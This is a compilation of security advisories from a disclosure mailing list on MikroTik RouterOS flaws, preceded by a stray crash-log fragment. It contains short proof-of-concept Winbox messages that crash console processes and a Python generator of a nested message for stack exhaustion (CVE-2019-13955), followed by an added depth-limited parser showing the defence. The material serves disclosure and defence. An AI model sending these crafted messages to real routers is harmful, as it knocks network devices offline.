2020.06.04-18:25:16.04@0: 774d2000-774d8000 r-xp 00:0c 951 /lib/liburadius.so
2020.06.04-18:25:16.04@0: 774d9000-77524000 r-xp 00:0c 956 /lib/libssl.so.1.0.0
2020.06.04-18:25:16.04@0: 77528000-7753 r-xp 00:0c 950 /lib/libubox.so
2020.06.04-18:25:16.04@0: 77531000-7757d000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.04-18:25:16.04@0: 7758-7759d000 r-xp 00:0c 947 /lib/libucrypto.so
2020.06.04-18:25:16.04@0: 7759e000-776fb000 r-xp 00:0c 954 /lib/libcrypto.so.1.0.0
2020.06.04-18:25:16.04@0: 7770e000-77715000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: stack: 0x7f8fb000 - 0x7f8fa448
2020.06.04-18:25:16.04@0: 00 90 48 77 00 90 48 77 88 a4 8f 7f 77 d0 47 77 06 00 00 00 00 92 48 77 20 00 00 00
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS

Details
===

Product: MikroTik's RouterOS
Affected Versions: until stable 6.45.7 (first vulnerability), until stable 6.46.4 (second vulnerability)
Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second vulnerability)
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team

Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as switches, routers and access points.

Description of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS stable release tree when found. Maybe other release trees also suffer from these vulnerabilities.

1. The cerm process suffers from an uncontrolled resource consumption issue. By sending a crafted packet, an authenticated remote user can cause a high CPU load, which may make the device respond slowly or be unable to respond.

2. The traceroute process suffers from a memory corruption issue. By sending a crafted packet, an authenticated remote user can crash the traceroute process due to invalid memory access.

Solution
==

Upgrade to the corresponding latest RouterOS tree version.

References
==

[1] https://mikrotik.com/download/changelogs/stable-release-tree
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2020/04/14] The latest stable release tree 6.46.5 still suffers from these two vulnerabilities.

Details
===

Product: MikroTik's RouterOS
Affected Versions: through 6.46.5 (stable release tree)
Fixed Versions: -
Vendor URL: https://mikrotik.com/
Vendor Status: not fixed yet
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team

Poc
===
The following pocs are based on the tool routeros (https://github.com/tenable/routeros)

1) memory corruption in console process

WinboxMessage msg;
msg.set_to(48, 4);
msg.set_command(0xfe0005);
msg.add_u32(0xfe000c, -1);
msg.add_u32(9, 9);

2) assertion failure in console process

WinboxMessage msg;
msg.set_to(48, 4);
msg.set_command(0xfe0005);
msg.add_u32(0xfe0001, 0);

Disclosure timeline
===
2019/08/23  reported the 2nd issue to the vendor
2019/08/26  reported the 1st issue to the vendor
2019/08/28  vendor reproduced the 1st issue and will fix it as soon as possible
2019/08/30  vendor reproduced the 2nd issue and will fix it as soon as possible
2019/12/02  notified the vendor the 1st issue still exists in version 6.44.6 (2nd issue fixed)
2020/01/06  no response from the vendor, and did the initial disclosure
2020/04/14  re-tested these two issues against the stable 6.46.5, and updated the disclosure

Q C wrote on Monday, 6 January 2020 at 19:32:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: before 6.44.6 (Long-term release tree)
> Fixed Versions: 6.44.6 (Long-term release tree)
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
> Description of vulnerabilities
> ==
>
> These two vulnerabilities were tested only against the MikroTik RouterOS
> long-term release tree when found. Maybe other release trees also suffer
> from these issues.
>
> 1. The console process suffers from a memory corruption issue.
> An authenticated remote user can crash the console process due to a NULL
> pointer dereference by sending a crafted packet.
>
> 2. The console process suffers from an assertion failure issue. There is a
> reachable assertion in the console process. An authenticated remote user
> can crash the console process due to assertion failure by sending a crafted
> packet.
>
> Solution
> ==
>
> Upgrade to the corresponding latest RouterOS tree version.
>
> References
> ==
>
> [1] https://mikrotik.com/download/changelogs/long-term-release-tree
>
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS

Details
===

Product: MikroTik's RouterOS
Affected Versions: before 6.44.6 (Long-term release tree)
Fixed Versions: 6.44.6 (Long-term release tree)
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team

Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as switches, routers and access points.

Description of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS long-term release tree when found. Maybe other release trees also suffer from these issues.

1. The console process suffers from a memory corruption issue. An authenticated remote user can crash the console process due to a NULL pointer dereference by sending a crafted packet.

2. The console process suffers from an assertion failure issue. There is a reachable assertion in the console process. An authenticated remote user can crash the console process due to assertion failure by sending a crafted packet.

Solution
==

Upgrade to the corresponding latest RouterOS tree version.

References
==

[1] https://mikrotik.com/download/changelogs/long-term-release-tree
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS

Details
===

Product: MikroTik's RouterOS
Affected Versions: before 6.44.5 (Long-term release tree), before 6.45.1 (Stable release tree)
Fixed Versions: 6.44.5 (Long-term release tree), 6.45.1 (Stable release tree)
Vendor URL: https://mikrotik.com/download/changelogs/long-term-release-tree
Vendor Status: fixed version released
CVE: CVE-2019-13954, CVE-2019-13955
Credit: Qian Chen(@cq674350529) of the Qihoo 360 Nirvan Team

Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as switches, routers and access points.

Details of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS 6.42.11 and 6.43.16 (Long-term release tree) when found.

1. CVE-2019-13954: memory exhaustion via a crafted POST request

This vulnerability is similar to CVE-2018-1157. An authenticated user can cause the www binary to consume all memory via a crafted POST request to /jsproxy/upload. It is because of the incomplete fix for CVE-2018-1157. Based on the poc for cve_2018_1157 provided by @Jacob Baines (really appreciate!), crafting a filename ending with many '\x00' can bypass the original fix to trigger the vulnerability.

2. CVE-2019-13955: stack exhaustion via recursive parsing of JSON

This vulnerability is similar to CVE-2018-1158. An authenticated user communicating with the www binary can trigger a stack exhaustion vulnerability via recursive parsing of JSON containing message type M. Based on the poc for cve_2018_1158 provided by @Jacob Baines (really appreciate!), crafting a JSON message with type M can trigger the vulnerability. A simple python script to generate the crafted message is as follows.

msg = "{M01:[M01:[]]}"
for _ in range(2000):  # range() also runs on Python 3; the original used xrange()
    msg = msg.replace('[]', "[M01:[]]")

Solution
==

Upgrade to RouterOS versions 6.44.5 (Long-term release tree), 6.45.1 (Stable release tree).

References
==

[1] https://mikrotik.com/download/changelogs/long-term-release-tree
[2] https://github.com/tenable/routeros
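The stack-exhaustion issue in CVE-2019-13955 is the classic failure mode of a parser that recurses once per nested container with no bound: the generator above produces 2003 nested containers, so the recursion goes as deep as the input says. The following is an added example, not the www binary's parser and not from the advisory or the tenable/routeros tool. It models the {KEY:[...]} syntax only as far as the PoC shows it (braces and brackets holding comma-separated KEY:VALUE pairs or bare values), reuses the advisory's construction in build_nested_message, and shows the defence a receiver would apply: a linear depth pre-check plus an explicit limit inside the recursive descent. MAX_DEPTH = 64 is an assumed value; crashes_without_guard runs the same parser with the limit removed so the 2000-level message hits Python's own recursion limit, which stands in for the www binary's thread stack.

```python
"""Depth-bounded parsing of the {KEY:[...]} message syntax (added example)."""
from typing import List, Optional, Tuple, Union

MAX_DEPTH = 64  # assumed limit; far beyond what a legitimate message needs

Node = Union[str, List["Node"], Tuple["Node", "Node"]]


class MessageTooDeep(ValueError):
    """Raised when container nesting exceeds the configured limit."""


def build_nested_message(levels: int) -> str:
    """Same construction as the advisory's script: one more level per step."""
    msg = "{M01:[M01:[]]}"
    for _ in range(levels):
        msg = msg.replace("[]", "[M01:[]]")
    return msg


def nesting_depth(msg: str) -> int:
    """Cheap pre-check: maximum container depth, computed without recursion."""
    depth = deepest = 0
    for ch in msg:
        if ch in "{[":
            depth += 1
            deepest = max(deepest, depth)
        elif ch in "]}":
            depth -= 1
    return deepest


def _parse(s: str, i: int, depth: int, max_depth: Optional[int]) -> Tuple[Node, int]:
    """Recursive descent over one value starting at offset i; returns (node, next offset)."""
    if i >= len(s):
        raise ValueError("unexpected end of message")
    if s[i] in "{[":
        # The guard: refuse to descend further than max_depth containers.
        if max_depth is not None and depth >= max_depth:
            raise MessageTooDeep(f"nesting deeper than {max_depth} at offset {i}")
        close = "}" if s[i] == "{" else "]"
        items: List[Node] = []
        i += 1
        while i < len(s) and s[i] != close:
            node, i = _parse(s, i, depth + 1, max_depth)
            if i < len(s) and s[i] == ":":  # KEY:VALUE pair
                value, i = _parse(s, i + 1, depth + 1, max_depth)
                node = (node, value)
            items.append(node)
            if i < len(s) and s[i] == ",":
                i += 1
        if i >= len(s):
            raise ValueError("unterminated container")
        return items, i + 1
    j = i
    while j < len(s) and s[j].isalnum():
        j += 1
    if j == i:
        raise ValueError(f"unexpected character {s[i]!r} at offset {i}")
    return s[i:j], j


def parse_message(msg: str, max_depth: Optional[int] = MAX_DEPTH) -> Node:
    """Parse a whole message; max_depth=None reproduces the unguarded behaviour."""
    node, end = _parse(msg, 0, 0, max_depth)
    if end != len(msg):
        raise ValueError(f"trailing data at offset {end}")
    return node


def accept(msg: str) -> bool:
    """Gatekeeper a receiver would run: linear depth check, then guarded parse."""
    if nesting_depth(msg) > MAX_DEPTH:
        return False
    try:
        parse_message(msg)
        return True
    except ValueError:  # MessageTooDeep is a ValueError too
        return False


def crashes_without_guard(msg: str) -> bool:
    """True when the unguarded parser runs into the interpreter's recursion limit."""
    try:
        parse_message(msg, max_depth=None)
        return False
    except RecursionError:
        return True
```

With the guard, the 2000-level message is rejected at container 64 after a few dozen frames; without it, the same parser recurses once per level until the interpreter stops it, which is the behaviour the advisory describes for the www binary's stack.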